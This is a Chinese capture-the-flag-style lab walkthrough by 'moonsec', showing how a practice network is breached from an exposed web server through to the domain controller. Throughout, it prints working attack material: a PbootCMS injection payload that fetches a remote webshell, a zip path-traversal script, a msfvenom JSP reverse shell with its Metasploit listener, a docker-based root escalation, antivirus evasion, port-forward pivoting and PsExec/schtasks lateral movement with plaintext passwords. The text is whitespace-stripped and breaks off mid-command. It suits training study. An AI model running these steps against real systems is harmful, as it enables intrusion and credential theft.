暗月實(shí)戰(zhàn)項(xiàng)目八FBI滲透高度安全的內(nèi)網(wǎng)

作者moonsec1.項(xiàng)目八FBI簡(jiǎn)介 22.靶場(chǎng)搭建 33.信息收集 73.1.masscan端口掃描 73.2.nmap端口掃描與探查 83.3.端口信息整理 93.4.綁定域名hosts 94.測(cè)試BOOTCMS安全 104.1.查看cms版本 104.2.下載備份文件 114.2.1.下載SQLITE數(shù)據(jù)庫(kù)文件 114.3.Sqlitebrowser讀取數(shù)據(jù)庫(kù)密文 114.4.登錄后臺(tái)拿WEBSHELL 125.繞過(guò)寶塔disable_functions 136.通過(guò)密鑰登錄SSH 157.利用docker提權(quán)root 168.滲透內(nèi)網(wǎng)WEB服務(wù)器 178.1.1.在cf1安裝nmap對(duì)內(nèi)網(wǎng)進(jìn)行主機(jī)發(fā)現(xiàn) 178.1.2.nmap掃主機(jī)端口 178.2.登錄后臺(tái)GETHSELL 198.3.metasploit生成jspshell 218.4.生成免殺bypassAV 229.對(duì)tomcat-web內(nèi)網(wǎng)服務(wù)器信息收集 259.1.MSF后門(mén)Bypassdefender 269.2.防火墻攔截 279.3.ipc空鏈接訪問(wèn)FILESERVER服務(wù)器 2710.metasploitshellcode免殺過(guò)defender和360 2710.1.開(kāi)啟tomcat服務(wù)器遠(yuǎn)程終端 2810.2.繞過(guò)CredSSP錯(cuò)誤信息 2810.3.破解tomcat服務(wù)器管理員hash 2911.添加ipsec入站規(guī)則.............................................................................................3011.1.sc復(fù)制文件到文件服務(wù)器 3011.2.at命令執(zhí)行文件 3011.3.schtasks命令執(zhí)行失敗 3111.4.Metasploit反像連接session 3111.5.Cobaltsctike反向連接后門(mén) 3212.對(duì)ad(域)網(wǎng)段進(jìn)行信息收集 3412.1.Nmap跨網(wǎng)段掃描AD域控端口 37Meterperter添加路由 3712.2.Impacketsecretsdump獲取域控哈希 3912.3.Impacketsmbexec.py登錄域控 4012.4.得到最終得flag 4113.關(guān)注 4114.培訓(xùn)網(wǎng)站 42本次靶場(chǎng)是一個(gè)高度安全的域控環(huán)境，存在多個(gè)防火墻，所以存在多個(gè)dmz，能有效隔離保護(hù)各個(gè)工作區(qū)。紅隊(duì)測(cè)試人員需要從互聯(lián)網(wǎng)從對(duì)外網(wǎng)WEB服務(wù)器進(jìn)行測(cè)試再進(jìn)入內(nèi)網(wǎng)服務(wù)器，進(jìn)行資產(chǎn)收集，再滲透核心區(qū)域，打穿AD域控，拿到域控的權(quán)限。本次靶場(chǎng)測(cè)試用到很多內(nèi)網(wǎng)穿透技術(shù)，繞過(guò)殺軟等紅隊(duì)技術(shù)。2.靶場(chǎng)搭建Ubuntu18.04選擇橋接Tomcat-web文件服務(wù)器windwosserver2016WindowsServer2019-DC3.信息收集3.1.masscan端口掃描sudomasscan--ports0-6553521--rate=500Scanning1hosts[65536ports/host]Discoveredopenport22/tcpon21Discoveredopenport8888/tcpon21Discoveredopenport80/tcpon21Discoveredopenport3306/tcpon21Discoveredopenport21/tcpon21Discoveredopenport888/tcpon213.2.nmap端口掃描與探查sudonmap-sS-p1-65535-v21-oAall-port詳細(xì)版本信息sudonmap-sC-A-p21,22,80,888,3306,88821-oAport-versionPORTSTATESERVICEVERSION21/tcpopenftpPure-FTPd|ssl-cert:Subject:commonName=99/organizationName=BT-PANEL/stateOrProvinceName=Guangdong/countryName=CN|Notvalidbefore:2020-10-28T04:54:10|_Notvalidafter:2030-07-28T04:54:10|_ssl-date:TLSrandomnessdoesnotrepresenttime22/tcpopensshOpenSSH7.6p1Ubuntu4ubuntu0.3(UbuntuLinux;protocol2.0)|ssh-hostkey:||2048de:fe:58:1c:ed:ef:1d:4f:56:9e:b8:1e:71:4d:86:70(RSA)256dc:5b:05:fa:fc:87:d5:f7:97:0a:13:04:fa:23:f0:9b(ECDSA)|_25647:ac:04:b5:4e:1d:a4:c9:c7:b0:7e:55:dd:26:96:2a(ED25519)80/tcpopenhttpApachehttpd|_http-server-header:Apache|_http-title:\xE6\xB2\xA1\xE6\x9C\x89\xE6\x89\xBE\xE5\x88\xB0\xE7\xAB\x99\xE7\x82\xB9888/tcpopenhttpApachehttpd|_http-server-header:Apache|_http-title:403Forbidden3306/tcpopenmysqlMySQL(unauthorized)MACAddress:00:0C:29:98:32:C7(VMware)Warning:OSScanresultsmaybeunreliablebecausewecouldnotfindatleast1openand1closedportAggressiveOSguesses:Linux2.6.32(96%),Linux3.2-4.9(96%),Linux2.6.32-3.10(96%),Linux3.4-3.10(95%),Linux3.1(95%),Linux3.2(95%),AXIS210Aor211NetworkCamera(Linux2.6.17)(94%),SynologyDiskStationManager5.2-5644(94%),NetgearRAIDiator4.2.28(94%),Linux2.6.32-2.6.35(94%)NoexactOSmatchesforhost(testconditionsnon-ideal).NetworkDistance:1hopServiceInfo:Host:0b842aa5.phpmyadmin;OS:Linux;CPE:cpe:/o:linux:linux_kernelTRACEROUTEHOPRTTADDRESS10.75ms213.3.端口信息整理端口版本信息21Pure-FTPd22OpenSSH7.6p1Ubuntu4ubuntu0.3(UbuntuLinux;protocol2.0默認(rèn)頁(yè)面寶塔套件信息888403Forbidden8888寶塔后臺(tái)登錄提示3306mysql3.4.綁定域名hosts訪問(wèn)IP根據(jù)提示綁定到21sudovi/etc/hosts訪問(wèn)4.1.查看cms版本cms的滲透思路確定cms版本查看升級(jí)說(shuō)明特別是漏洞公告然后進(jìn)行文件對(duì)比定位漏洞分析漏洞與補(bǔ)丁/doc/ChangeLog.txt4.2.下載備份文件用備份掃描器獲取備份文件/config.tar.gz/config/database.php~Bootcms默認(rèn)數(shù)據(jù)庫(kù)是sqlite默認(rèn)下載data/pbootcms.db查看config.php發(fā)現(xiàn)默認(rèn)db位置已經(jīng)修改data/c6613b090db86e60916afb3af6f923d2.db4.3.Sqlitebrowser讀取數(shù)據(jù)庫(kù)密文sqlitebrowserc6613b090db86e60916afb3af6f923d2.dbCMD5解密密文是admin7788賬號(hào)admin14e1b600b1fd579f47433b88e8d85291admin77884.4.登錄后臺(tái)拿WEBSHELL在公司信息填寫(xiě){pboot:if(implode('',['f','i','l','e','_','p','u'.'t','_c','o','n','t','e','n','t','s'])(implode('',['2','.php']),implode('',['<?phpfile_','put_','contents(','"moon.php",','file','_get_','contents("','http://80/2.txt"))?>'])))}!!!{/pboot:if}在本地生成一個(gè)2.php文件再去訪問(wèn)2.php會(huì)根目錄下生成moon.phpdisable_functions利用php7-backtrace-bypass/mm0r1/exploits發(fā)現(xiàn)存在用戶cf1:x:1000:1000:CF1,,,:/home/cf1:/bin/bash復(fù)制私鑰id_rsa設(shè)置權(quán)限chmod600id_rsassh-iid_rsacf1@192.168.0.121dockerrun-v/etc:/mnt-italpineopensslpasswd-1--saltmoonsec$1$moonsec$.VXUP/Jd9iJIiqrZv/vyj1往passwd增加用戶信息sumoonsec切換用戶即可獲取root權(quán)限8.滲透內(nèi)網(wǎng)WEB服務(wù)器nmap-sn192.168.0.0/24-T4對(duì)內(nèi)網(wǎng)整個(gè)段主機(jī)發(fā)現(xiàn)8.1.2.nmap掃主機(jī)端口root@08:/tmp#nmap-F24StartingNmap7.60()at2020-11-0712:20CSTNmapscanreportfor24Hostisup(-0.15slatency).Notshown:98filteredportsPORTSTATESERVICE3306/tcpopenmysql8080/tcpopenhttp-proxyMACAddress:00:0C:29:E7:BD:FC(VMware)8.2.登錄后臺(tái)GETHSELL后臺(tái)弱口令12345624:8080/cmscp/創(chuàng)建穿越漏洞壓縮文件importzipfileif__name__=="__main__":try:binary=b'<script>alert("helloworld")</script>'zipFile=zipfile.ZipFile("test5.zip","a",zipfile.ZIP_DEFLATED)info=zipfile.ZipInfo("test5.zip")zipFile.writestr("../../../moonsec.html",binary)zipFile.close()exceptIOErrorase:raisee將war文件后門(mén)加入目錄壓縮包內(nèi)上傳文件解壓后沒(méi)任何文件生成估計(jì)被殺軟攔截了。項(xiàng)目可以過(guò)殺軟的/SecurityRiskAdvisors上傳后解壓自動(dòng)解壓到http://192.168.0.124:8080/cmd/cmd.jsp新建html引用加載代碼<scripttype="text/javascript"src="a.js"></script>能夠執(zhí)行命令了但是執(zhí)行其他命令失敗上傳文件也失敗8.3.metasploit生成jspshell網(wǎng)上很多war都被系統(tǒng)自帶的殺軟查剛好發(fā)現(xiàn)msf自帶得jsp可以繞過(guò)。msfvenom-pjava/jsp_shell_reverse_tcpLHOST=192.168.0.180LPORT=8888-fraw>shell.jsp創(chuàng)建文件夾WEB-INFweb.xml文件內(nèi)容<?xmlversion="1.0"encoding="ISO-8859-1"?><web-appxmlns="/xml/ns/j2ee"xmlns:xsi="/2001/XMLSchema-instance"xsi:schemaLocation="/xml/ns/j2ee/xml/ns/j2ee/web-app_2_4.xsd"version="2.4"><display-name>Main</display-name><description>Shell</description><servlet><servlet-name>shell</servlet-name><jsp-file>/shell.jsp</jsp-file></servlet><servlet-mapping><servlet-name>shell</servlet-name><url-pattern>/shell</url-pattern></servlet-mapping></web-app>Jar-cvfshell.war.shell.jsp包成war包Metasploit監(jiān)聽(tīng)jspmsf5>useexploit/multi/handler[*]Usingconfiguredpayloadgeneric/shell_reverse_tcpmsf5exploit(multi/handler)>setpayloadjava/jsp_shell_reverse_tcpmsf5exploit(multi/handler)>setlhost80lhost=>80msf5exploit(multi/handler)>setlport8888lport=>8888msf5exploit(multi/handler)>setshellcmd.exeshell=>cmd.exemsf5exploit(multi/handler)>exploit得到seesion權(quán)限是管理員8.4.生成免殺bypassAV簡(jiǎn)單收集一下進(jìn)行發(fā)現(xiàn)存在數(shù)個(gè)殺軟exe目前可以過(guò)defender和360全套但是執(zhí)行沒(méi)有返回shell估計(jì)是被行為攔截了。研究了一下過(guò)了9.對(duì)tomcat-web內(nèi)網(wǎng)服務(wù)器信息收集內(nèi)網(wǎng)段存活主機(jī)9.1.MSF后門(mén)Bypassdefender現(xiàn)在可以在metasploit下操作了添加路由開(kāi)啟socks4a9.2.防火墻攔截nmap對(duì)28對(duì)其端口掃描發(fā)現(xiàn)只允許開(kāi)放445端口可以訪問(wèn)到文件服務(wù)器。er出現(xiàn)這種情況用同樣版本的或者是win2016的主機(jī)鏈接就能解決11.添加ipsec入站規(guī)則在添加規(guī)則之前要登錄系統(tǒng)把360安全衛(wèi)士關(guān)掉，不然會(huì)進(jìn)行netsh攔截shellnetshinterfaceportproxyaddv4tov4listenport=7788connectaddress=30connectport=7788查看規(guī)則netshinterfaceportproxyshowall11.1.sc復(fù)制文件到文件服務(wù)器查看時(shí)間nettime\\28執(zhí)行任務(wù)shellattime\\10.10.1.12822:59:00c:/windows/temp/rve.exeat命令已經(jīng)沒(méi)用chtasksshellSCHTASKS/Create/S28/uadministrator/pQWEasd123/SCONCE/ST23:40/TNtest1/TRc:\windows\temp\rve.exe/RUsystemPsExec.exe\\28-uadministrator-pQWEasd123-ic:\\w